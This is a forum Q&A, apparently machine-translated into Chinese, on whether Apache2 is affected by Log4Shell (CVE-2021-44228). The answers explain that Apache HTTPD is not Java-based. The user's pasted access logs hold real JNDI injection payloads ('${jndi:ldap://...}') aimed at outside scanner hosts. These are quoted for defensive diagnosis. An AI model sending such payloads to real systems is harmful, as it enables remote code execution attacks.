Apache2
Apache Webserver 是否使用 log4j (CVE-2021-44228)?
apache 網路伺服器 (apache2) 是否使用 log4j?
我在 Raspberry Pi OS(64 位)上安裝了 Apache2 2.4.38(debian),並在我的日誌中發現了一些關於來自(honeypot/掃描器)、(離線和惡意?)和(我不知道是什麼)的CVE-2021-44228的奇怪記錄這是)
kryptoslogic-cve-2021-44228.com``dataastatistics.com``a8fvkc.dnslog.cn
我現在該怎麼辦?
- 沒什麼,因為 apache2 不受 CVE-2021-44228 的影響
- 格式化所有內容並等待幾天,然後再安裝修補版本
- “檢查”是否有任何新的 .class 文件以及是否沒有繼續操作(並使用手動更新檔,例如
log4j2.formatMsgNoLookups = TRUE
- 別的東西
日誌:
139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}" 139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}" 139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale" 139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale" 139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale" 139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}" 139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic Telltale" 191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" 191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" 191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" 191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" 191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" 137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}" 137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}" 137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
Apache HTTP Server不是用 Java 編寫的,它不使用 log4j 庫,因此不受 CVE-2021-44228 的影響。
您的日誌文件來自訪問日誌,它們顯示人們正在掃描 log4j 漏洞。
Apache 本身不是用 Java 編寫的,也沒有直接連結臭名昭著的 Log4j 庫。它對這個漏洞特別安全。
那麼還有什麼問題呢?
- 並非所有名稱中帶有 Apache 和 HTTP 功能的東西都完全是Apache HTTPD 伺服器。例如,Apache Tomcat 是完全不同的 HTTP Web 伺服器。它是用 Java 編寫的,幾乎可以配置為使用 Log4J。我不確定是否可以在 Tomcat 中以其他方式登錄。
經驗和知識較少的人完全有可能誤會這兩者。而且,據我所知,Tomcat 通常比“經典”Apache HTTPD 具有更好的安全記錄。
(根據 Bob 的評論,Tomcat 中的預設日誌記錄工具不是 Log4J。)
- Apache HTTPD 是非常可擴展的。它可以配置為通過各種介面在後台呼叫其他東西(例如,為了獲取以程式方式生成的動態網頁)。其中一些“後台的東西”可能是基於 java 的並連結到 Log4J 庫。
您的里程可能會有所不同,特別是如果您不詳細了解您的軟體堆棧。
為了確定,您應該首先檢查您是否安裝了任何 Java 機器。在您的包管理器中,它的包將被稱為 JRE-something、JVM-something 或 JAVA-something。
你不妨試試:
java版本
在你的殼裡。
如果您沒有這些,並且您沒有在包管理器之外安裝 JAVA,那麼您是安全的。
一般不安全,但至少對 CVE-2021-44228 是安全的。